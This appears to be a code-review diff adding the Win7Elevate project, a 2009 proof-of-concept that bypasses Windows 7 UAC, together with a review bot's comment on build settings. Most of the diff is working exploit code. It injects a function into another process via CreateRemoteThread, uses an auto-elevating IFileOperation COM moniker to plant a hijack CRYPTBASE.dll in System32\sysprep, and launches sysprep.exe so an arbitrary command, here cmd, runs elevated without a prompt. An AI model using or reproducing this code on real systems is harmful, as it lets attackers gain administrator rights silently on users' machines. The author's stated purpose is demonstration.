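Review bot: The two Debug `ItemDefinitionGroup`s carry no `<ResourceCompile>` definitions, while Win7Elevate.rc selects the embedded DLL and EXE paths with `#ifdef _DEBUG` and `#ifdef _WIN64`. Unless an inherited property sheet supplies those macros to the resource compiler, a Debug|Win32 or Debug|x64 build takes the `#else` branches and packages the `..\Win32\Release\` binaries, so the artifact does not match the configuration being built and may contain stale or missing files. The Release groups already pass `WIN32` / `WIN64;_WIN64` to the resource compiler; the Debug groups need the same, plus `_DEBUG`. The fence below shows the two elements to add.

```xml
<!-- inside the Debug|Win32 ItemDefinitionGroup, after </BuildLog> -->
<ResourceCompile>
  <PreprocessorDefinitions>WIN32;_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<!-- inside the Debug|x64 ItemDefinitionGroup, after </BuildLog> -->
<ResourceCompile>
  <PreprocessorDefinitions>WIN64;_WIN64;_DEBUG;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
```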
|
|
@ -0,0 +1,59 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="targetver.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Win7Elevate_Inject.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Win7Elevate_Utils.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Resource.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Win7Elevate.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Win7Elevate_Inject.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Win7Elevate_Utils.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\CMMN.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\Redirector.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ResourceCompile Include="Win7Elevate.rc">
|
||||
<Filter>Resource Files</Filter>
|
||||
</ResourceCompile>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,14 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<ShowAllFiles>false</ShowAllFiles>
|
||||
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">/c cmd</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">/c cmd</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">WindowsLocalDebugger</DebuggerFlavor>
|
||||
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WindowsLocalDebugger</DebuggerFlavor>
|
||||
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">/c cmd</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Release|x64'">/c cmd</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">WindowsLocalDebugger</DebuggerFlavor>
|
||||
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Release|x64'">WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
</Project>
|
|
@ -0,0 +1,455 @@
|
|||
#include "stdafx.h"
|
||||
#include "Win7Elevate_Utils.h"
|
||||
#include "Win7Elevate_Inject.h"
|
||||
|
||||
#include ".\..\CMMN.h"
|
||||
|
||||
// All code (except for GetElevationType) (C) Leo Davidson, 8th February 2009, all rights reserved.
|
||||
// (Minor tidy-up 12th June 2009 for the code's public release.)
|
||||
// http://www.pretentiousname.com
|
||||
// leo@ox.compsoc.net
|
||||
//
|
||||
// Using any part of this code for malicious purposes is expressly forbidden.
|
||||
//
|
||||
// This proof-of-concept code is intended only to demonstrate that code-injection
|
||||
// poses a real problem with the default UAC settings in Windows 7 (tested with RC1 build 7100).
|
||||
|
||||
struct InjectArgs
|
||||
{
|
||||
BOOL (WINAPI *fpFreeLibrary)(HMODULE hLibModule);
|
||||
HMODULE (WINAPI *fpLoadLibrary)(LPCWSTR lpLibFileName);
|
||||
FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
|
||||
BOOL (WINAPI *fpCloseHandle)(HANDLE);
|
||||
DWORD (WINAPI *fpWaitForSingleObject)(HANDLE,DWORD);
|
||||
const wchar_t *szSourceDll;
|
||||
const wchar_t *szElevDir;
|
||||
const wchar_t *szElevDll;
|
||||
const wchar_t *szElevDllFull;
|
||||
const wchar_t *szElevExeFull;
|
||||
wchar_t *szElevArgs; // Not const because of CreateProcess's in-place buffer modification. It's really not const so this is fine. (We don't use CreateProcess anymore but it doesn't hurt to keep this non-const just in case.)
|
||||
const wchar_t *szEIFOMoniker; // szElevatedIFileOperationMoniker
|
||||
const IID *pIID_EIFOClass;
|
||||
const IID *pIID_EIFO;
|
||||
const IID *pIID_ShellItem2;
|
||||
const IID *pIID_Unknown;
|
||||
const wchar_t *szShell32;
|
||||
const wchar_t *szOle32;
|
||||
const char *szCoInitialize;
|
||||
const char *szCoUninitialize;
|
||||
const char *szCoGetObject;
|
||||
const char *szCoCreateInstance;
|
||||
const char *szSHCreateItemFPN; // SHCreateItemFromParsingName
|
||||
const char *szShellExecuteExW;
|
||||
};
|
||||
|
||||
static DWORD WINAPI RemoteCodeFunc(LPVOID lpThreadParameter)
|
||||
{
|
||||
// This is the injected code of "part 1."
|
||||
|
||||
// As this code is copied into another process it cannot refer to any static data (i.e. no string, GUID, etc. constants)
|
||||
// and it can only directly call functions that are within Kernel32.dll (which is all we need as it lets us call
|
||||
// LoadLibrary and GetProcAddress). The data we need (strings, GUIDs, etc.) is copied into the remote process and passed to
|
||||
// us in our InjectArgs structure.
|
||||
|
||||
// The compiler settings are important. You have to ensure that RemoteCodeFunc doesn't do any stack checking (since it
|
||||
// involves a call into the CRT which may not exist (in the same place) in the target process) and isn't made inline
|
||||
// or anything like that. (Compiler optimizations are best turned off.) You need RemoteCodeFunc to be compiled into a
|
||||
// contiguous chunk of assembler that calls/reads/writes nothing except its own stack variables and what is passed to it via pArgs.
|
||||
|
||||
// It's also important that all asm jump instructions in this code use relative addressing, not absolute. Jumps to absolute
|
||||
// addresses will not be valid after the code is copied to a different address in the target process. Visual Studio seems
|
||||
// to use absolute addresses sometimes and relative ones at other times and I'm not sure what triggers one or the other. For example,
|
||||
// I had a problem with it turning a lot of the if-statements in this code into absolute jumps when compiled for 32-bit and that
|
||||
// seemed to go away when I set the Release build to generate a PDF file, but then they came back again.
|
||||
// I never had this problem in February, and 64-bit builds always seem fine, but now in June I'm getting the problem with 32-bit
|
||||
// builds on my main machine. However, if I switch to the older compiler install and older Windows SDK that I have on another machine
|
||||
// it always builds a working 32-bit (and 64-bit) version, just like it used to. So I guess something in the compiler/SDK has triggered
|
||||
// this change but I don't know what. It could just be that things have moved around in memory due to a structure size change and that's
|
||||
// triggering the different modes... I don't know!
|
||||
//
|
||||
// So if the 32-bit version crashes the process you inject into, you probably need to work out how to convince the compiler
|
||||
// to generate the code it used to in February. :) Or you could write some code to fix up the jump instructions after copying them,
|
||||
// or hand-code the 32-bit asm (seems you can ignore 64-bit as it always works so far), or find a style of if-statement (or equivalent)
|
||||
// that always generates relative jumps, or whatever...
|
||||
//
|
||||
// Take a look at the asm_code_issue.png image that comes with the source to see what the absolute and relative jumps look like.
|
||||
//
|
||||
// PS: I've never written Intel assembler, and it's many years since I've hand-written any type of assembler, so I may have the wrong end
|
||||
// of the stick about some of this! Either way, 32-bit version works when built on my older compiler/SDK install and usually doesn't on
|
||||
// the newer install.
|
||||
|
||||
InjectArgs * pArgs = reinterpret_cast< InjectArgs * >(lpThreadParameter);
|
||||
|
||||
// Use an elevated FileOperation object to copy a file to a protected folder.
|
||||
// If we're in a process that can do silent COM elevation then we can do this without any prompts.
|
||||
|
||||
HMODULE hModuleOle32 = pArgs->fpLoadLibrary(pArgs->szOle32);
|
||||
HMODULE hModuleShell32 = pArgs->fpLoadLibrary(pArgs->szShell32);
|
||||
|
||||
if (hModuleOle32
|
||||
&& hModuleShell32)
|
||||
{
|
||||
// Load the non-Kernel32.dll functions that we need.
|
||||
|
||||
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPVOID pvReserved) >
|
||||
tfpCoInitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoInitialize );
|
||||
|
||||
W7EUtils::GetProcAddr< void (STDAPICALLTYPE *)(void) >
|
||||
tfpCoUninitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoUninitialize );
|
||||
|
||||
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) >
|
||||
tfpCoGetObject( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoGetObject );
|
||||
|
||||
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) >
|
||||
tfpCoCreateInstance( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoCreateInstance );
|
||||
|
||||
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) >
|
||||
tfpSHCreateItemFromParsingName( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szSHCreateItemFPN );
|
||||
|
||||
W7EUtils::GetProcAddr< BOOL (STDAPICALLTYPE *)(LPSHELLEXECUTEINFOW lpExecInfo) >
|
||||
tfpShellExecuteEx( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szShellExecuteExW );
|
||||
|
||||
if (0 != tfpCoInitialize.f
|
||||
&& 0 != tfpCoUninitialize.f
|
||||
&& 0 != tfpCoGetObject.f
|
||||
&& 0 != tfpCoCreateInstance.f
|
||||
&& 0 != tfpSHCreateItemFromParsingName.f
|
||||
&& 0 != tfpShellExecuteEx.f)
|
||||
{
|
||||
if (S_OK == tfpCoInitialize.f(NULL))
|
||||
{
|
||||
BIND_OPTS3 bo;
|
||||
for(int i = 0; i < sizeof(bo); ++i) { reinterpret_cast< BYTE * >(&bo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
|
||||
bo.cbStruct = sizeof(bo);
|
||||
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
|
||||
|
||||
// For testing other COM objects/methods, start here.
|
||||
{
|
||||
IFileOperation *pFileOp = 0;
|
||||
IShellItem *pSHISource = 0;
|
||||
IShellItem *pSHIDestination = 0;
|
||||
IShellItem *pSHIDelete = 0;
|
||||
|
||||
// This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection.
|
||||
if (
|
||||
(pArgs->szEIFOMoniker && S_OK == tfpCoGetObject.f( pArgs->szEIFOMoniker, &bo, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
|
||||
|| (pArgs->pIID_EIFOClass && S_OK == tfpCoCreateInstance.f( *pArgs->pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER|CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
|
||||
)
|
||||
if (0 != pFileOp)
|
||||
if (S_OK == pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION))
|
||||
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szSourceDll, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)))
|
||||
if (0 != pSHISource)
|
||||
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDir, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)))
|
||||
if (0 != pSHIDestination)
|
||||
if (S_OK == pFileOp->CopyItem(pSHISource, pSHIDestination, pArgs->szElevDll, NULL))
|
||||
if (S_OK == pFileOp->PerformOperations())
|
||||
{
|
||||
// Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call.
|
||||
// (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.)
|
||||
SHELLEXECUTEINFO shinfo;
|
||||
for(int i = 0; i < sizeof(shinfo); ++i) { reinterpret_cast< BYTE * >(&shinfo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
|
||||
shinfo.cbSize = sizeof(shinfo);
|
||||
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
|
||||
shinfo.lpFile = pArgs->szElevExeFull;
|
||||
shinfo.lpParameters = pArgs->szElevArgs;
|
||||
shinfo.lpDirectory = pArgs->szElevDir;
|
||||
shinfo.nShow = SW_SHOW;
|
||||
|
||||
if (tfpShellExecuteEx.f(&shinfo) && shinfo.hProcess != NULL)
|
||||
{
|
||||
// Wait for the "part 2" target process to finish.
|
||||
pArgs->fpWaitForSingleObject(shinfo.hProcess, INFINITE);
|
||||
|
||||
pArgs->fpCloseHandle(shinfo.hProcess);
|
||||
}
|
||||
|
||||
// Another standard call to IFileOperation, this time to delete our dummy DLL. We clean up our mess.
|
||||
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDllFull, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDelete)))
|
||||
if (0 != pSHIDelete)
|
||||
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
|
||||
{
|
||||
pFileOp->PerformOperations();
|
||||
}
|
||||
}
|
||||
|
||||
if (pSHIDelete) { pSHIDelete->Release(); }
|
||||
if (pSHIDestination) { pSHIDestination->Release(); }
|
||||
if (pSHISource) { pSHISource->Release(); }
|
||||
if (pFileOp) { pFileOp->Release(); }
|
||||
}
|
||||
|
||||
tfpCoUninitialize.f();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (hModuleShell32) { pArgs->fpFreeLibrary(hModuleShell32); }
|
||||
if (hModuleOle32) { pArgs->fpFreeLibrary(hModuleOle32); }
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
// Marks the end of the function so we know how much data to copy.
|
||||
volatile static void DummyRemoteCodeFuncEnd()
|
||||
{
|
||||
}
|
||||
|
||||
void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName,
|
||||
const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir,
|
||||
const wchar_t *szPathToOurDll,
|
||||
DWORD (__stdcall *Redirector)(void))
|
||||
{
|
||||
bool bThreadWaitSuccess = false;
|
||||
bool bThreadWaitFailure = false;
|
||||
HANDLE hTargetProc = NULL;
|
||||
|
||||
const BYTE * codeStartAdr = reinterpret_cast< const BYTE * >( &RemoteCodeFunc );
|
||||
const BYTE * codeEndAdr = reinterpret_cast< const BYTE * >( &DummyRemoteCodeFuncEnd );
|
||||
|
||||
if (codeStartAdr >= codeEndAdr)
|
||||
{
|
||||
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Unexpected function layout");
|
||||
return;
|
||||
}
|
||||
|
||||
wchar_t szPathToSelf[MAX_PATH];
|
||||
|
||||
DWORD dwGMFNRes = GetModuleFileName(NULL, szPathToSelf, _countof(szPathToSelf));
|
||||
|
||||
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
|
||||
{
|
||||
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Couldn't get path to self");
|
||||
return;
|
||||
}
|
||||
|
||||
wchar_t szProgramFiles[MAX_PATH];
|
||||
|
||||
HRESULT hr = SHGetFolderPath(NULL, CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, szProgramFiles);
|
||||
|
||||
if (S_OK != hr)
|
||||
{
|
||||
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"SHGetFolderPath failed");
|
||||
return;
|
||||
}
|
||||
|
||||
HMODULE hModKernel32 = LoadLibrary(L"kernel32.dll");
|
||||
|
||||
if (hModKernel32 == 0)
|
||||
{
|
||||
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Couldn't load kernel32.dll");
|
||||
return;
|
||||
}
|
||||
|
||||
W7EUtils::GetProcAddr< BOOL (WINAPI *)(HMODULE) > tfpFreeLibrary( &GetProcAddress, hModKernel32, "FreeLibrary");
|
||||
W7EUtils::GetProcAddr< HMODULE (WINAPI *)(LPCWSTR) > tfpLoadLibrary( &GetProcAddress, hModKernel32, "LoadLibraryW");
|
||||
W7EUtils::GetProcAddr< FARPROC (WINAPI *)(HMODULE, LPCSTR) > tfpGetProcAddress( &GetProcAddress, hModKernel32, "GetProcAddress");
|
||||
W7EUtils::GetProcAddr< BOOL (WINAPI *)(HANDLE) > tfpCloseHandle( &GetProcAddress, hModKernel32, "CloseHandle");
|
||||
W7EUtils::GetProcAddr< DWORD (WINAPI *)(HANDLE,DWORD) > tfpWaitForSingleObject( &GetProcAddress, hModKernel32, "WaitForSingleObject");
|
||||
|
||||
if (0 == tfpFreeLibrary.f
|
||||
|| 0 == tfpLoadLibrary.f
|
||||
|| 0 == tfpGetProcAddress.f
|
||||
|| 0 == tfpCloseHandle.f
|
||||
|| 0 == tfpWaitForSingleObject.f)
|
||||
{
|
||||
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Couldn't find API");
|
||||
}
|
||||
else
|
||||
{
|
||||
// Here we define the target process and DLL for "part 2." This is an auto/silent-elevating process which isn't
|
||||
// directly below System32 and which loads a DLL which is directly below System32 but isn't on the OS's "Known DLLs" list.
|
||||
// If we copy our own DLL with the same name to the exe's folder then the exe will load our DLL instead of the real one.
|
||||
const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep";
|
||||
const wchar_t *szElevDll = L"CRYPTBASE.dll";
|
||||
const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
|
||||
const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
|
||||
std::wstring strElevArgs = L"\"";
|
||||
// strElevArgs += szElevExeFull;
|
||||
// strElevArgs += L"\" \"";
|
||||
strElevArgs += szCmd;
|
||||
strElevArgs += L"\" \"";
|
||||
strElevArgs += szDir;
|
||||
strElevArgs += L"\" \"";
|
||||
for (const wchar_t *pCmdArgChar = szArgs; *szArgs; ++szArgs)
|
||||
{
|
||||
if (*szArgs != L'\"')
|
||||
{
|
||||
strElevArgs += *szArgs;
|
||||
}
|
||||
else
|
||||
{
|
||||
strElevArgs += L"\"\"\""; // Turn each quote into three to preserve them in the arguments.
|
||||
}
|
||||
}
|
||||
strElevArgs += L"\"";
|
||||
|
||||
if (!bInject)
|
||||
{
|
||||
// Test code without remoting.
|
||||
// This should result in a UAC prompt, if UAC is on at all and we haven't been launched as admin.
|
||||
|
||||
// Satisfy CreateProcess's non-const args requirement
|
||||
wchar_t *szElevArgsNonConst = new wchar_t[strElevArgs.length() + 1];
|
||||
wcscpy_s(szElevArgsNonConst, strElevArgs.length() + 1, strElevArgs.c_str());
|
||||
|
||||
InjectArgs ia;
|
||||
ia.fpFreeLibrary = tfpFreeLibrary.f;
|
||||
ia.fpLoadLibrary = tfpLoadLibrary.f;
|
||||
ia.fpGetProcAddress = tfpGetProcAddress.f;
|
||||
ia.fpCloseHandle = tfpCloseHandle.f;
|
||||
ia.fpWaitForSingleObject = tfpWaitForSingleObject.f;
|
||||
ia.szSourceDll = szPathToOurDll;
|
||||
ia.szElevDir = szElevDir;
|
||||
ia.szElevDll = szElevDll;
|
||||
ia.szElevDllFull = szElevDllFull;
|
||||
ia.szElevExeFull = szElevExeFull;
|
||||
ia.szElevArgs = szElevArgsNonConst;
|
||||
ia.szShell32 = L"shell32.dll";
|
||||
ia.szOle32 = L"ole32.dll";
|
||||
ia.szCoInitialize = "CoInitialize";
|
||||
ia.szCoUninitialize = "CoUninitialize";
|
||||
ia.szCoGetObject = "CoGetObject";
|
||||
ia.szCoCreateInstance = "CoCreateInstance";
|
||||
ia.szSHCreateItemFPN = "SHCreateItemFromParsingName";
|
||||
ia.szShellExecuteExW = "ShellExecuteExW";
|
||||
ia.szEIFOMoniker = bElevate ? L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" : NULL;
|
||||
ia.pIID_EIFOClass = bElevate ? NULL : &__uuidof(FileOperation);
|
||||
ia.pIID_EIFO = &__uuidof(IFileOperation);
|
||||
ia.pIID_ShellItem2 = &__uuidof(IShellItem2);
|
||||
ia.pIID_Unknown = &__uuidof(IUnknown);
|
||||
|
||||
RemoteCodeFunc(&ia);
|
||||
|
||||
delete[] szElevArgsNonConst;
|
||||
}
|
||||
else if (W7EUtils::OpenProcessToInject(hWnd, &hTargetProc, dwPid, szProcName))
|
||||
{
|
||||
// Test code with remoting.
|
||||
// At least as of RC1 build 7100, with the default OS settings, this will run the specified command
|
||||
// with elevation but without triggering a UAC prompt.
|
||||
|
||||
// Scope CRemoteMemory so it's destroyed before the process handle is closed.
|
||||
{
|
||||
W7EUtils::CRemoteMemory reme(hTargetProc);
|
||||
|
||||
InjectArgs ia;
|
||||
// ASSUMPTION: Remote process has same ASLR setting as us (i.e. ASLR = on)
|
||||
// kernel32.dll is mapped to the same address range in both processes.
|
||||
ia.fpFreeLibrary = tfpFreeLibrary.f;
|
||||
ia.fpLoadLibrary = tfpLoadLibrary.f;
|
||||
ia.fpGetProcAddress = tfpGetProcAddress.f;
|
||||
ia.fpCloseHandle = tfpCloseHandle.f;
|
||||
ia.fpWaitForSingleObject = tfpWaitForSingleObject.f;
|
||||
|
||||
// It would be more efficient to allocate and copy the data in one
|
||||
// block but since this is just a proof-of-concept I don't bother.
|
||||
|
||||
ia.szSourceDll = reme.AllocAndCopyMemory(szPathToOurDll);
|
||||
ia.szElevDir = reme.AllocAndCopyMemory(szElevDir);
|
||||
ia.szElevDll = reme.AllocAndCopyMemory(szElevDll);
|
||||
ia.szElevDllFull = reme.AllocAndCopyMemory(szElevDllFull);
|
||||
ia.szElevExeFull = reme.AllocAndCopyMemory(szElevExeFull);
|
||||
ia.szElevArgs = reme.AllocAndCopyMemory(strElevArgs.c_str(), false); // Leave this page writeable for CreateProcess.
|
||||
|
||||
ia.szShell32 = reme.AllocAndCopyMemory(L"shell32.dll");
|
||||
ia.szOle32 = reme.AllocAndCopyMemory(L"ole32.dll");
|
||||
ia.szCoInitialize = reme.AllocAndCopyMemory("CoInitialize");
|
||||
ia.szCoUninitialize = reme.AllocAndCopyMemory("CoUninitialize");
|
||||
ia.szCoGetObject = reme.AllocAndCopyMemory("CoGetObject");
|
||||
ia.szCoCreateInstance = reme.AllocAndCopyMemory("CoCreateInstance");
|
||||
ia.szSHCreateItemFPN = reme.AllocAndCopyMemory("SHCreateItemFromParsingName");
|
||||
ia.szShellExecuteExW = reme.AllocAndCopyMemory("ShellExecuteExW");
|
||||
ia.szEIFOMoniker = bElevate ? reme.AllocAndCopyMemory(L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}") : NULL;
|
||||
ia.pIID_EIFOClass = bElevate ? NULL : reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(FileOperation), sizeof(__uuidof(FileOperation)), false) );
|
||||
ia.pIID_EIFO = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IFileOperation), sizeof(__uuidof(IFileOperation)), false) );
|
||||
ia.pIID_ShellItem2 = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IShellItem2), sizeof(__uuidof(IShellItem2)), false) );
|
||||
ia.pIID_Unknown = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IUnknown), sizeof(__uuidof(IUnknown)), false) );
|
||||
|
||||
void *pRemoteArgs = reme.AllocAndCopyMemory(&ia, sizeof(ia), false);
|
||||
|
||||
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
|
||||
|
||||
if (reme.AnyFailures())
|
||||
{
|
||||
//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Remote allocation failed");
|
||||
}
|
||||
else
|
||||
{
|
||||
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
|
||||
|
||||
if (hRemoteThread == 0)
|
||||
{
|
||||
//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
L"Couldn't create remote thread",
|
||||
L"CreateRemoteThread"));
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
if ( Redirector )
|
||||
Redirector();
|
||||
|
||||
while(true)
|
||||
{
|
||||
DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 10000);
|
||||
|
||||
if (dwWaitRes == WAIT_OBJECT_0)
|
||||
{
|
||||
bThreadWaitSuccess = true;
|
||||
break;
|
||||
}
|
||||
else if (dwWaitRes != WAIT_TIMEOUT)
|
||||
{
|
||||
bThreadWaitFailure = true;
|
||||
break;
|
||||
}
|
||||
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
|
||||
else
|
||||
{
|
||||
CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
|
||||
// See if it completed before the user asked to stop waiting.
|
||||
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
|
||||
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
|
||||
{
|
||||
bThreadWaitSuccess = true;
|
||||
}
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (!bThreadWaitSuccess)
|
||||
{
|
||||
// The memory in the other process could still be in use.
|
||||
// Freeing it now will almost certainly crash the other process.
|
||||
// Letting it leak is the lesser of two evils...
|
||||
reme.LeakMemory();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
CloseHandle(hTargetProc);
|
||||
}
|
||||
}
|
||||
|
||||
FreeLibrary(hModKernel32);
|
||||
|
||||
if (bThreadWaitFailure)
|
||||
{
|
||||
//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Error waiting on the remote thread to complete");
|
||||
}
|
||||
else if (bThreadWaitSuccess)
|
||||
{
|
||||
//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
|
||||
CLogger::LogLine(L"Remote thread completed");
|
||||
}
|
||||
}
|
|
@ -0,0 +1,9 @@
|
|||
#pragma once
|
||||
|
||||
namespace W7EInject
|
||||
{
|
||||
void AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName,
|
||||
const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir,
|
||||
const wchar_t *szPathToOurDll,
|
||||
DWORD (__stdcall *Redirector)(void));
|
||||
}
|
|
